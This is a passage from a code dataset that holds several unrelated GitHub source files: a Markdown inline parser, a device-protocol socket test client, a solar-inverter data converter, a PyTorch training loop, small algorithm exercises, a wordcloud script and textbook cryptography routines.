before_is_punctuation))\n right_flanking = (not before_is_whitespace and\n (not before_is_punctuation or\n after_is_whitespace or\n after_is_punctuation))\n\n if marker[0] == '_':\n can_open = (left_flanking and\n (not right_flanking or before_is_punctuation))\n can_close = (right_flanking and\n (not left_flanking or after_is_punctuation))\n else:\n can_open = left_flanking\n can_close = right_flanking\n\n document += addnodes.emphasis(marker=marker, can_open=can_open, can_close=can_close,\n orig_length=len(marker), curr_length=len(marker),\n interior=can_open and can_close)\n return True\n\n\n# 6.7 Autolinks\nclass URIAutolinkProcessor(PatternInlineProcessor):\n pattern = re.compile(r'<([a-z][a-z0-9+.-]{1,31}:[^<>\\x00-\\x20]*)>', re.I)\n\n def run(self, reader: TextReader, document: Element) -> bool:\n uri = reader.consume(self.pattern).group(1)\n document += nodes.reference(uri, uri, refuri=normalize_uri(uri))\n return True\n\n\nclass EmailAutolinkProcessor(PatternInlineProcessor):\n pattern = re.compile(r'<([a-zA-Z0-9.!#$%&\\'*+/=?^_`{|}~-]+@[a-zA-Z0-9]'\n r'(?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?'\n r'(?:\\.[a-zA-Z0-9](?:[a-zA-Z0-9-]{0,61}[a-zA-Z0-9])?)*)>')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n uri = reader.consume(self.pattern).group(1)\n document += nodes.reference(uri, uri, refuri='mailto:' + normalize_uri(uri))\n return True\n\n\n# 6.8 Raw HTML\nclass RawHTMLProcessor(PatternInlineProcessor):\n HTML_COMMENT = r'|'\n PROCESSING_INSTRUCTION = r\"<\\?.*?\\?>\"\n DECLARATION = r\"]*>\"\n CDATA = r''\n HTMLTAG = (\"(?:\" + OPENTAG + \"|\" + CLOSETAG + \"|\" + HTML_COMMENT + \"|\" +\n PROCESSING_INSTRUCTION + \"|\" + DECLARATION + \"|\" + CDATA + \")\")\n pattern = re.compile(HTMLTAG)\n\n def run(self, reader: TextReader, document: Element) -> bool:\n html = reader.consume(self.pattern).group(0)\n document += nodes.raw(html, html, format='html')\n return True\n\n\n# 6.9 Hard line breaks\nclass HardLinebreakProcessor(PatternInlineProcessor):\n pattern = re.compile(r'( {2,}|\\\\)\\n')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n if not isinstance(document, nodes.paragraph):\n return False\n else:\n reader.consume(self.pattern)\n document += addnodes.linebreak()\n return True\n\n\n# 6.10 Soft line breaks\nclass SoftLinebreakProcessor(PatternInlineProcessor):\n pattern = re.compile(r'\\s(?=\\n)')\n\n def run(self, reader: TextReader, document: Element) -> bool:\n if not isinstance(document, nodes.paragraph):\n return False\n else:\n reader.consume(self.pattern) # skip over a space at tail\n document += addnodes.SparseText(reader.subject, reader.position, reader.position)\n return True\n","repo_name":"pycmark/pycmark","sub_path":"pycmark/inlineparser/std_processors.py","file_name":"std_processors.py","file_ext":"py","file_size_in_byte":6560,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"25167304029","text":"# coding:utf-8\nimport socket\nimport json\nimport time\nimport threading\n# from oracle import oracle_handler\nimport threading\nfrom time import sleep, ctime\nimport multiprocessing\n# from data_vb_vs import *\nimport data_vb_vs\nfrom datetime import datetime\nimport os\n\n\n#打开一个socket连接\nip_port = ('47.94.179.118', 8031)#定义端口号和IP地址\nclient = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nclient.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)#开启一个心跳维护\nclient.connect(ip_port)#连接\n\n#socket注册和心跳维护方法\ndef send_message(innerCode,key):\n\tmessage=data_vb_vs.register_data(innerCode,key)#定义一个message,返回一个注册机器的信息\n\tclient.sendall(message)#发送信息给服务器端\n\t# res=client.recv(1024)\n\t# print(res,ctime())\n\twhile True:\n\t\t# print('hh')\n\t\tmessage1=data_vb_vs.heart_data(innerCode)#定义一个message,返回一个心跳类的信息\n\t\tclient.sendall(message1)#发送心跳信息到服务器\n\t\t# ret=client.recv(1024)\n\t\t# print(message1)\n\t\ttime.sleep(50)#休眠50s\n\n#接受socket消息的方法\ndef reserve_messsage():\n\twhile True:\n\t\t# time.sleep(7)\n\t\treturnMessage=client.recv(40000)#用returnMessage 接受所有socket返回的消息\n\t\tif not returnMessage == '':#判断如果返回的消息不为空\n\t\t\tmessage_string_list = returnMessage.decode('utf8').split('\\n')#返回的消息从byte类型转义成char类型,然后再通过‘\\n’分割,用一个列表接受\n\t\t\tprint(message_string_list, ctime())\n\t\t\tfor message_finaly in message_string_list:#循环取出列表中的各个消息\n\t\t\t\tif not message_finaly == '':#如果消息不为空\n\t\t\t\t\thasInnerCode = message_finaly.find(\"innerCode\")#查找消息是否有\"innerCode\"字段\n\t\t\t\t\thasMsgType = message_finaly.find(\"msgType\")#查找消息是否有\"msgType\"字段\n\t\t\t\t\tif hasInnerCode < 0 or hasMsgType < 0:#如果message_finaly中没有\"innerCode\"或者\"msgType\"字段,跳出循环\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tmessageRes = json.loads(message_finaly)#其他情况下,把message_fianly转化成字典格式\n\t\t\t\t\t\tif not messageRes['data'] == '':#如果messageRes的key-‘data’不为空\n\t\t\t\t\t\t\tif not messageRes['data']['msgType'] == 'heart':#如果收到的消息不是心跳消息\n\t\t\t\t\t\t\t\tif messageRes['data']['msgType'] == 'ask' or messageRes['data']['msgType'] == 'outSku':#如果收到的消息类型是‘ask’或者‘outSku’\n\t\t\t\t\t\t\t\t\t# time.sleep(7)#可以设置一个休眠\n\t\t\t\t\t\t\t\t\tsn = messageRes['sn']#取出收到消息中的sn\n\t\t\t\t\t\t\t\t\tmessageSend = data_vb_vs.commenResponse_data(sn)#通过消息去把回复数据整理一下\n\t\t\t\t\t\t\t\t\tprint(messageSend, ctime())\n\t\t\t\t\t\t\t\t\tclient.sendall(messageSend)#发送处理后的消息\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t#如果收到的消息是其他类型的消息\n\t\t\t\t\t\t\t\t\tsn = messageRes['sn']#获取sn\n\t\t\t\t\t\t\t\t\tmessageSend = data_vb_vs.commenResponse_data(sn)#整理回复数据\n\t\t\t\t\t\t\t\t\tprint(messageSend, ctime())\n\t\t\t\t\t\t\t\t\tclient.sendall(messageSend)#发送数据\n\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t#如果收到的消息是心跳消息,直接pass掉不用管\n\t\t\t\t\t\t\t\tpass\n\n#定义一个多线程执行的方法\ndef test(innercode,key):\n\tthreads=[]#定义一个空的线程组列表\n\tt1=threading.Thread(target=send_message,args=(innercode,key))#新建一个线程t1,执行send_message方法,\n\tthreads.append(t1)#把线程t1加入threads列表\n\tt2=threading.Thread(target=reserve_messsage)#新建一个线程t2,执行reserve_messsage方法\n\tthreads.append(t2)#把线程t2加入threads列表\n\n\tfor t in range(0,len(threads)):\n\t\t#循环启动线程组中的线程\n\t\tthreads[t].start()\n\tfor t in range(0, len(threads)):\n\t\t#守护线程组中的线程\n\t\tthreads[t].join()\n\nif __name__ == '__main__':\n\t#调用方法需要两个参数,机器编号,和key\n\ttest('01000003',\"c3afea0993ce30e566ada5f967488105c3afea0993ce30e566ada5f967488105\")\n\n\n","repo_name":"yangxue198749/Testscript","sub_path":"sckt.py","file_name":"sckt.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"8955239008","text":"\"\"\"\n'growatt' is the inverter for the solar panels.\n\nExample:\n {\n \"energy_today_high\": 0.0,\n \"energy_today_low\": 34196.0,\n \"energy_high\": 1.0,\n \"energy_low\": 34196.0,\n \"epv_today_high\": 0.0,\n \"epv_today_low\": 61164.0,\n \"epv_high\": 0.0,\n \"epv_low\": 61164.0,\n \"worktime_high\": 712.0,\n \"worktime_low\": 59344.0,\n \"active\": 255.0,\n \"reactive\": 255.0,\n \"voltage\": 6000.0,\n \"pf\": 65535.0,\n \"phigh\": 0.0,\n \"plow\": 60000.0,\n \"state\": 1.0,\n \"input_high\": 0.0,\n \"input_low\": 2377.0,\n \"pv1_voltage\": 3371.0,\n \"pv1_current\": 4.0,\n \"pv1_power_high\": 0.0,\n \"pv1_power_low\": 1348.0,\n \"pv2_voltage\": 2573.0,\n \"pv2_current\": 4.0,\n \"pv2_power_high\": 0.0,\n \"pv2_power_low\": 1029.0,\n \"output_high\": 0.0,\n \"output_low\": 2077.0,\n \"grid_freq\": 4999.0,\n \"grid_voltage\": 2382.0,\n \"grid_current\": 3.0,\n \"grid_output_high\": 0.0,\n \"grid_output_low\": 714.0,\n \"grid_voltage_2\": 2388.0,\n \"grid_current_2\": 3.0,\n \"grid_output_2_high\": 0.0,\n \"grid_output_2_low\": 716.0,\n \"grid_voltage_3\": 2385.0,\n \"grid_current_3\": 3.0,\n \"grid_output_3_high\": 0.0,\n \"grid_output_3_low\": 715.0,\n \"fault_iso\": 0.0,\n \"fault_gfci\": 0.0,\n \"fault_dci\": 0.0,\n \"fault_pv\": 0.0,\n \"fault_ac_volt\": 0.0,\n \"fault_ac_freq\": 0.0,\n \"fault_temperature\": 0.0,\n \"fault_code\": 0.0,\n \"temperature\": 411.0\n }\n\nFault values are of no real interest, and there are a few values thare are\nnearly always fixed. Next to the values given, also create a few values that\nare a combination of them, to make graphs easier later on.\n\n'total' values appear to be corrupted. This already happens on the Modbus. So\nwe have to ignore those values, and start fresh every day with counting.\n\n'epv_' values are only of pv1, not of pv2 or the combination. As such, they\nare not usable. This is a mistake in the code of Homij.\n\nstate:\n 0 = waiting\n 1 = normal\n 3 = fault\n\"\"\"\n\n\ndef get_high_low(data, label):\n return (int(data[f\"{label}_high\"]) << 16) | int(data[f\"{label}_low\"])\n\n\ndef convert_measurement(data):\n payload = {\n \"growatt_state\": {\n \"value\": data[\"state\"],\n \"unit\": \"enum\",\n },\n \"growatt_temperature\": {\n \"value\": data[\"temperature\"] / 10,\n \"unit\": \"celcius\",\n },\n \"growatt_grid_energy_today\": {\n \"value\": get_high_low(data, \"energy_today\") / 10,\n \"unit\": \"kWh\",\n },\n \"growatt_pv_voltage_1\": {\n \"value\": data[\"pv1_voltage\"] / 10,\n \"unit\": \"V\",\n },\n \"growatt_pv_voltage_2\": {\n \"value\": data[\"pv2_voltage\"] / 10,\n \"unit\": \"V\",\n },\n \"growatt_pv_voltage\": {\n \"value\": (data[\"pv1_voltage\"] + data[\"pv2_voltage\"]) / 2 / 10,\n \"unit\": \"V\",\n },\n \"growatt_pv_current_1\": {\n \"value\": data[\"pv1_current\"] / 10,\n \"unit\": \"A\",\n },\n \"growatt_pv_current_2\": {\n \"value\": data[\"pv2_current\"] / 10,\n \"unit\": \"A\",\n },\n \"growatt_pv_current\": {\n \"value\": (data[\"pv1_current\"] + data[\"pv2_current\"]) / 2 / 10,\n \"unit\": \"A\",\n },\n \"growatt_pv_energy_1\": {\n \"value\": get_high_low(data, \"pv1_power\") / 10,\n \"unit\": \"W\",\n },\n \"growatt_pv_energy_2\": {\n \"value\": get_high_low(data, \"pv2_power\") / 10,\n \"unit\": \"W\",\n },\n \"growatt_pv_energy\": {\n \"value\": get_high_low(data, \"input\") / 10,\n \"unit\": \"W\",\n },\n \"growatt_grid_freq\": {\n \"value\": data[\"grid_freq\"] / 100,\n \"unit\": \"Hz\",\n },\n \"growatt_grid_voltage_1\": {\n \"value\": data[\"grid_voltage\"] / 10,\n \"unit\": \"V\",\n },\n \"growatt_grid_voltage_2\": {\n \"value\": data[\"grid_voltage_2\"] / 10,\n \"unit\": \"V\",\n },\n \"growatt_grid_voltage_3\": {\n \"value\": data[\"grid_voltage_3\"] / 10,\n \"unit\": \"V\",\n },\n \"growatt_grid_voltage\": {\n \"value\": (data[\"grid_voltage\"] + data[\"grid_voltage_2\"] + data[\"grid_voltage_3\"]) / 3 / 10,\n \"unit\": \"V\",\n },\n \"growatt_grid_current_1\": {\n \"value\": data[\"grid_current\"] / 10,\n \"unit\": \"A\",\n },\n \"growatt_grid_current_2\": {\n \"value\": data[\"grid_current_2\"] / 10,\n \"unit\": \"A\",\n },\n \"growatt_grid_current_3\": {\n \"value\": data[\"grid_current_3\"] / 10,\n \"unit\": \"A\",\n },\n \"growatt_grid_current\": {\n \"value\": (data[\"grid_current\"] + data[\"grid_current_2\"] + data[\"grid_current_3\"]) / 3 / 10,\n \"unit\": \"A\",\n },\n \"growatt_grid_energy_1\": {\n \"value\": get_high_low(data, \"grid_output\") / 10,\n \"unit\": \"W\",\n },\n \"growatt_grid_energy_2\": {\n \"value\": get_high_low(data, \"grid_output_2\") / 10,\n \"unit\": \"W\",\n },\n \"growatt_grid_energy_3\": {\n \"value\": get_high_low(data, \"grid_output_3\") / 10,\n \"unit\": \"W\",\n },\n \"growatt_grid_energy\": {\n \"value\": get_high_low(data, \"output\") / 10,\n \"unit\": \"W\",\n },\n }\n\n return payload\n","repo_name":"TrueBrain/homij_mitm","sub_path":"homij_mitm/converters/growatt.py","file_name":"growatt.py","file_ext":"py","file_size_in_byte":5547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41055950506","text":"# 순열과 조합\n\n\n## 순열: 서로 다른 n개에서 서로 다른 r개를 선택하여 일렬로 나열하는 것.\n### 'abc' 'acb' 'bac' 'bca' 'cab' 'cba'\n\nfrom itertools import permutations\n\ndata = ['a', 'b', 'c']\n\nresult = list(permutations(data, 3))\nprint(result)\n\n\n## 조합: 서로 다른 n개에서 순서에 상관 없이 서로 다른 r개를 선택하는 것\n### 'ab' 'ac' 'bc'\n\nfrom itertools import combinations\ndata = ['a', 'b', 'c']\nresult = list(combinations(data, 2))\nprint(result)\n\n\n## 중복 순열\n\nfrom itertools import product\nresult = list(product(data, repeat = 2)) ## 2개를 뽑는 모든 순열 구하기 (중복허용)\nprint(result)\n\n\n\n## 중복 조합\nfrom itertools import combinations_with_replacement\nresult = list(combinations_with_replacement(data, 2)) ## 2개를 뽑는 모든 조합 구하기(중복허용)\nprint(result)","repo_name":"yangwonhee/algorithm","sub_path":"dongbin/01_5.py","file_name":"01_5.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9483100325","text":"# encoding: utf-8\n\"\"\"\ncredit:\nhttps://github.com/facebookresearch/detectron2/blob/master/detectron2/engine/train_loop.py\n\"\"\"\n\nimport logging\nimport time\nimport weakref\nfrom typing import Dict\n\nimport numpy as np\nimport torch\nfrom torch.nn.parallel import DataParallel, DistributedDataParallel\n\nimport fastreid.utils.comm as comm\nfrom fastreid.utils.events import EventStorage, get_event_storage\nfrom fastreid.utils.params import ContiguousParams\n\n__all__ = [\"HookBase\", \"TrainerBase\", \"SimpleTrainer\"]\n\nlogger = logging.getLogger(__name__)\n\n\nclass HookBase:\n \"\"\"\n Base class for hooks that can be registered with :class:`TrainerBase`.\n Each hook can implement 6 methods. The way they are called is demonstrated\n in the following snippet:\n .. code-block:: python\n hook.before_train()\n for _ in range(start_epoch, max_epoch):\n hook.before_epoch()\n for iter in range(start_iter, max_iter):\n hook.before_step()\n trainer.run_step()\n hook.after_step()\n hook.after_epoch()\n hook.after_train()\n Notes:\n 1. In the hook method, users can access `self.trainer` to access more\n properties about the context (e.g., current iteration).\n 2. A hook that does something in :meth:`before_step` can often be\n implemented equivalently in :meth:`after_step`.\n If the hook takes non-trivial time, it is strongly recommended to\n implement the hook in :meth:`after_step` instead of :meth:`before_step`.\n The convention is that :meth:`before_step` should only take negligible time.\n Following this convention will allow hooks that do care about the difference\n between :meth:`before_step` and :meth:`after_step` (e.g., timer) to\n function properly.\n Attributes:\n trainer: A weak reference to the trainer object. Set by the trainer when the hook is\n registered.\n \"\"\"\n\n def before_train(self):\n \"\"\"\n Called before the first iteration.\n \"\"\"\n pass\n\n def after_train(self):\n \"\"\"\n Called after the last iteration.\n \"\"\"\n pass\n\n def before_epoch(self):\n \"\"\"\n Called before each epoch.\n \"\"\"\n pass\n\n def after_epoch(self):\n \"\"\"\n Called after each epoch.\n \"\"\"\n pass\n\n def before_step(self):\n \"\"\"\n Called before each iteration.\n \"\"\"\n pass\n\n def after_step(self):\n \"\"\"\n Called after each iteration.\n \"\"\"\n pass\n\n\nclass TrainerBase:\n \"\"\"\n Base class for iterative trainer with hooks.\n The only assumption we made here is: the training runs in a loop.\n A subclass can implement what the loop is.\n We made no assumptions about the existence of dataloader, optimizer, model, etc.\n Attributes:\n iter(int): the current iteration.\n epoch(int): the current epoch.\n start_iter(int): The iteration to start with.\n By convention the minimum possible value is 0.\n max_epoch (int): The epoch to end training.\n storage(EventStorage): An EventStorage that's opened during the course of training.\n \"\"\"\n\n def __init__(self):\n self._hooks = []\n\n def register_hooks(self, hooks):\n \"\"\"\n Register hooks to the trainer. The hooks are executed in the order\n they are registered.\n Args:\n hooks (list[Optional[HookBase]]): list of hooks\n \"\"\"\n hooks = [h for h in hooks if h is not None]\n for h in hooks:\n assert isinstance(h, HookBase)\n # To avoid circular reference, hooks and trainer cannot own each other.\n # This normally does not matter, but will cause memory leak if the\n # involved objects contain __del__:\n # See http://engineering.hearsaysocial.com/2013/06/16/circular-references-in-python/\n h.trainer = weakref.proxy(self)\n self._hooks.extend(hooks)\n\n def train(self, start_epoch: int, max_epoch: int, iters_per_epoch: int):\n \"\"\"\n Args:\n start_epoch, max_epoch (int): See docs above\n \"\"\"\n logger = logging.getLogger(__name__)\n logger.info(\"Starting training from epoch {}\".format(start_epoch))\n\n self.iter = self.start_iter = start_epoch * iters_per_epoch\n\n with EventStorage(self.start_iter) as self.storage:\n try:\n self.before_train()\n for self.epoch in range(start_epoch, max_epoch):\n self.before_epoch()\n for _ in range(iters_per_epoch):\n self.before_step()\n self.run_step()\n self.after_step()\n self.iter += 1\n self.after_epoch()\n except Exception:\n logger.exception(\"Exception during training:\")\n raise\n finally:\n self.after_train()\n\n def before_train(self):\n for h in self._hooks:\n h.before_train()\n\n def after_train(self):\n self.storage.iter = self.iter\n for h in self._hooks:\n h.after_train()\n\n def before_epoch(self):\n self.storage.epoch = self.epoch\n\n for h in self._hooks:\n h.before_epoch()\n\n def before_step(self):\n self.storage.iter = self.iter\n\n for h in self._hooks:\n h.before_step()\n\n def after_step(self):\n for h in self._hooks:\n h.after_step()\n\n def after_epoch(self):\n for h in self._hooks:\n h.after_epoch()\n\n def run_step(self):\n raise NotImplementedError\n\n\nclass SimpleTrainer(TrainerBase):\n \"\"\"\n A simple trainer for the most common type of task:\n single-cost single-optimizer single-data-source iterative optimization.\n It assumes that every step, you:\n 1. Compute the loss with a data from the data_loader.\n 2. Compute the gradients with the above loss.\n 3. Update the model with the optimizer.\n If you want to do anything fancier than this,\n either subclass TrainerBase and implement your own `run_step`,\n or write your own training loop.\n \"\"\"\n\n def __init__(self, model, data_loader, optimizer, param_wrapper):\n \"\"\"\n Args:\n model: a torch Module. Takes a data from data_loader and returns a\n dict of heads.\n data_loader: an iterable. Contains data to be used to call model.\n optimizer: a torch optimizer.\n \"\"\"\n super().__init__()\n\n \"\"\"\n We set the model to training mode in the trainer.\n However it's valid to train a model that's in eval mode.\n If you want your model (or a submodule of it) to behave\n like evaluation during training, you can overwrite its train() method.\n \"\"\"\n model.train()\n\n self.model = model\n self.data_loader = data_loader\n self._data_loader_iter = iter(data_loader)\n self.optimizer = optimizer\n self.param_wrapper = param_wrapper\n\n def run_step(self):\n \"\"\"\n Implement the standard training logic described above.\n \"\"\"\n assert self.model.training, \"[SimpleTrainer] model was changed to eval mode!\"\n start = time.perf_counter()\n \"\"\"\n If your want to do something with the data, you can wrap the dataloader.\n \"\"\"\n data = next(self._data_loader_iter)\n data_time = time.perf_counter() - start\n\n \"\"\"\n If your want to do something with the heads, you can wrap the model.\n \"\"\"\n\n loss_dict = self.model(data)\n losses = sum(loss_dict.values())\n\n \"\"\"\n If you need accumulate gradients or something similar, you can\n wrap the optimizer with your custom `zero_grad()` method.\n \"\"\"\n self.optimizer.zero_grad()\n\n losses.backward()\n\n self._write_metrics(loss_dict, data_time)\n\n \"\"\"\n If you need gradient clipping/scaling or other processing, you can\n wrap the optimizer with your custom `step()` method.\n \"\"\"\n self.optimizer.step()\n if isinstance(self.param_wrapper, ContiguousParams):\n self.param_wrapper.assert_buffer_is_valid()\n\n def _write_metrics(self, loss_dict: Dict[str, torch.Tensor], data_time: float):\n \"\"\"\n Args:\n loss_dict (dict): dict of scalar losses\n data_time (float): time taken by the dataloader iteration\n \"\"\"\n device = next(iter(loss_dict.values())).device\n\n # Use a new stream so these ops don't wait for DDP or backward\n with torch.cuda.stream(torch.cuda.Stream() if device.type == \"cuda\" else None):\n metrics_dict = {k: v.detach().cpu().item() for k, v in loss_dict.items()}\n metrics_dict[\"data_time\"] = data_time\n\n # Gather metrics among all workers for logging\n # This assumes we do DDP-style training, which is currently the only\n # supported method in detectron2.\n all_metrics_dict = comm.gather(metrics_dict)\n\n if comm.is_main_process():\n storage = get_event_storage()\n\n # data_time among workers can have high variance. The actual latency\n # caused by data_time is the maximum among workers.\n data_time = np.max([x.pop(\"data_time\") for x in all_metrics_dict])\n storage.put_scalar(\"data_time\", data_time)\n\n # average the rest metrics\n metrics_dict = {\n k: np.mean([x[k] for x in all_metrics_dict]) for k in all_metrics_dict[0].keys()\n }\n total_losses_reduced = sum(metrics_dict.values())\n if not np.isfinite(total_losses_reduced):\n raise FloatingPointError(\n f\"Loss became infinite or NaN at iteration={self.iter}!\\n\"\n f\"loss_dict = {metrics_dict}\"\n )\n\n storage.put_scalar(\"total_loss\", total_losses_reduced)\n if len(metrics_dict) > 1:\n storage.put_scalars(**metrics_dict)\n\n\nclass AMPTrainer(SimpleTrainer):\n \"\"\"\n Like :class:`SimpleTrainer`, but uses automatic mixed precision\n in the training loop.\n \"\"\"\n\n def __init__(self, model, data_loader, optimizer, param_wrapper, grad_scaler=None):\n \"\"\"\n\n Args:\n model, data_loader, optimizer: same as in :class:`SimpleTrainer`.\n grad_scaler: torch GradScaler to automatically scale gradients.\n \"\"\"\n unsupported = \"AMPTrainer does not support single-process multi-device training!\"\n if isinstance(model, DistributedDataParallel):\n assert not (model.device_ids and len(model.device_ids) > 1), unsupported\n assert not isinstance(model, DataParallel), unsupported\n\n super().__init__(model, data_loader, optimizer, param_wrapper)\n\n if grad_scaler is None:\n from torch.cuda.amp import GradScaler\n\n grad_scaler = GradScaler()\n self.grad_scaler = grad_scaler\n\n def run_step(self):\n \"\"\"\n Implement the AMP training logic.\n \"\"\"\n assert self.model.training, \"[AMPTrainer] model was changed to eval mode!\"\n assert torch.cuda.is_available(), \"[AMPTrainer] CUDA is required for AMP training!\"\n from torch.cuda.amp import autocast\n\n start = time.perf_counter()\n data = next(self._data_loader_iter)\n data_time = time.perf_counter() - start\n\n with autocast():\n loss_dict = self.model(data)\n losses = sum(loss_dict.values())\n\n self.optimizer.zero_grad()\n self.grad_scaler.scale(losses).backward()\n\n self._write_metrics(loss_dict, data_time)\n\n self.grad_scaler.step(self.optimizer)\n self.grad_scaler.update()\n if isinstance(self.param_wrapper, ContiguousParams):\n self.param_wrapper.assert_buffer_is_valid()\n","repo_name":"JDAI-CV/fast-reid","sub_path":"fastreid/engine/train_loop.py","file_name":"train_loop.py","file_ext":"py","file_size_in_byte":12011,"program_lang":"python","lang":"en","doc_type":"code","stars":3122,"dataset":"github-code","pt":"19"} +{"seq_id":"39461619882","text":"'''\nCool dynamic programming solution (memoization)\nJust grow the number of houses one at a time. At each house record the max that can be stolen\n which is either the loot up to 2 houses ago + this house, or the loot up to past house - because of the adjacency requirement.\n\nGood reminder to shrink problems down then grow them up.\n'''\nclass Solution:\n def rob(self, nums):\n p1, p2 = 0,0\n for i in range(len(nums)):\n p2, p1 = p1, max(p1, p2 + nums[i])\n return p1\n\n\n\nif __name__ == \"__main__\":\n sol = Solution()\n nums = [2,7,9,3,1]\n print(sol.rob(nums))","repo_name":"drewserles/LeetCodeChallenges","sub_path":"101-200/p198.py","file_name":"p198.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25456869083","text":"import os\nimport sys\n\nfrom PIL import Image\nfrom wordcloud import WordCloud\n\nfrom scripts.chord import Chord\n\npath = sys.argv[1]\n\nwith open(path, \"r\", encoding=\"utf8\") as f:\n raw = f.read()\n\ntext = []\nfor word in raw.split():\n word = word.strip()\n if Chord.is_chord(word):\n continue\n if word.startswith('['):\n continue\n text.append(word)\n\nfor i in range(10):\n text.append(os.path.splitext(os.path.basename(path))[0])\n\ntext = ' '.join(text).lower()\n\ntext = u\"\"\"Mezi nebem a zemí, přibližně v půli cesty,\nmezi magickou krajinou a dusivými městy;\nOdhalí se v pravou chvíli\nsamého vědomí hranice.\nA dá se po ní tiše přejít,\nskrz bílou linku ve světle měsíce\nradno je dobrých mravů dbáti, neboť stává se nejednou, \nže si vlídné Přízraky na kus řeči přisednou.\nSlušností je přivítat a nabídnout cigaretu, \npři tom vzácném prolnutí\njindy uzavřených světů.\nDo stromových domků vstoupit smí se \ni bez pozvání, \ntřeba je ale rozloučit se hbitě,\njakmile ozve se za zády klepání.\nNěkdy v brzkém odpoledni k procházce přizve lesní pěšina, \nběda však těm, kdo zapomenou, kde končí a kde začíná.\nStává se totiž nepozorným dobrodruhům, \nže zabloudí v mlze k vílám, \nvyhne se ale hříbky lemovaným kruhům, ten, komu je duše jeho milá;\nBytosti tajemného hvozdu omamnou melodii pějí, \nmísty znepokojivou, jako chvění prasklé struny\n\nV prazvláštním tichu okolí ty tóny dlouze znějí,\ntu nad hlavou, tu zas pod nohama zjevují se runy.\nNa kopci v místě čtyř živlů smíření\nse ve stínu kříže poodhalí Znamení,\nzjeví se kudlanka, můra či netopýr,\nzapsal jsem jejich poselství na papír;\nA jako důkaz na místě činu \nzanechám předmět doličný,\nobálku pod listím břečťanu \nkdesi v Šentvidu pri Stični\"\"\".lower()\n\nstopwords = {'z', 'o', 'a', 'v', 's', 'že', 'do', 'se', 'na', 've', 'nananana', 'ze'}\n\n# with open(\"C:/Users/Lamanchy/Downloads/stopwords-cs.txt\", \"r\", encoding='utf8') as f:\n# stopwords = set([i.strip() for i in f.readlines()])\n\nwordcloud = WordCloud(\n stopwords=stopwords,\n max_words=10000000,\n min_font_size=10,\n relative_scaling=0.1,\n min_word_length=2,\n normalize_plurals=False,\n repeat=True,\n width=int(105/25.4*300),\n height=int(148/25.4*300),\n collocations=True,\n include_numbers=True,\n # colormap=\"Pastel2\",\n font_path=\"C:/Users/Lamanchy/PycharmProjects/songbook/pil_quality_pdf/fonts/calibri.ttf\",\n).generate(text)\n\nwordcloud.to_file(\"test.png\")\nimg = Image.open('test.png')\nimg.show()\n\n# import matplotlib as mpl\n# import matplotlib.pyplot as plt\n#\n# def plot_colorMaps(cmap):\n#\n# fig, ax = plt.subplots(figsize=(4,0.4))\n# col_map = plt.get_cmap(cmap)\n# mpl.colorbar.ColorbarBase(ax, cmap=col_map, orientation = 'horizontal')\n#\n# plt.show()\n#\n#\n# for cmap_id in plt.colormaps():\n# print(cmap_id)\n# plot_colorMaps(cmap_id)\n\n# Pastel1 Pastel2 Wistia\n","repo_name":"lamanchy/songbook","sub_path":"show_wordcloud.py","file_name":"show_wordcloud.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"cs","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"41756864897","text":"import math\nfrom random import randint\n\n\ndef Exponentiation(a, x, p):\n y = 1\n while 0 < x:\n if x % 2 == 1:\n y = y * a % p\n a = a * a % p\n x //= 2\n return y\n\n\ndef EuclidAlgorithm(a, b) -> object:\n U = [a, 1, 0]\n V = [b, 0, 1]\n T = [0] * 3\n while V[0] != 0:\n q = U[0] // V[0]\n T[0] = U[0] % V[0]\n T[1] = U[1] - q * V[1]\n T[2] = U[2] - q * V[2]\n for i in range(3):\n U[i] = V[i]\n V[i] = T[i]\n return U\n\n\ndef NOD(x, y):\n if x > y:\n x, y = y, x\n while y != 0:\n r = x % y\n x = y\n y = r\n return x\n\n\ndef Ferma(x):\n if x == 2:\n return True\n if x & 1 == 0:\n return False\n for i in range(100):\n a = randint(0, 10 ** 9)\n if NOD(a, x) != 1 or Exponentiation(a, x - 1, x) != 1:\n return False\n return True\n\n\ndef DiffieHellman():\n while True: # generation q\n q = randint(0, 10 ** 9)\n p = 2 * q + 1 # calculation P\n if Ferma(q) and Ferma(p): # check P and q for simplicity\n break\n\n while True: # generation g\n g = randint(0, 10 ** 9)\n if 1 < g < p - 1 and Exponentiation(g, q, p) != 1:\n break\n\n Xa = randint(1, p)\n Xb = randint(1, p)\n\n Ya = Exponentiation(g, Xa, p)\n Yb = Exponentiation(g, Xb, p)\n\n Za = Exponentiation(Yb, Xa, p)\n Zb = Exponentiation(Ya, Xb, p)\n print(Za, \" == \", Zb)\n\n\ndef BabyStepGiantStep(p, a, y):\n m = k = math.ceil(math.sqrt(p))\n L1 = [0] * m\n L2 = [0] * k\n for i in range(m):\n L1[i] = (Exponentiation(a, i, p) * Exponentiation(y, 1, p)) % p\n for i in range(k):\n L2[i] = Exponentiation(a, (i + 1) * m, p) % p\n\n dictionary = dict()\n for i in range(m):\n dictionary[L1[i]] = i\n for i in range(k):\n if dictionary.get(L2[i]):\n x = ((i + 1) * m) - (dictionary[L2[i]])\n print(\"x = {:10d} ==> {:10d} == {:10d}\".format(x, y, Exponentiation(a, x, p)))\n return\n\n\ndef main():\n print(\"1. Exponentiation modulo:\")\n print(\"expect: \", 5 ** 12 % 7, \"receive: \", Exponentiation(5, 12, 7))\n print(\"expect: \", 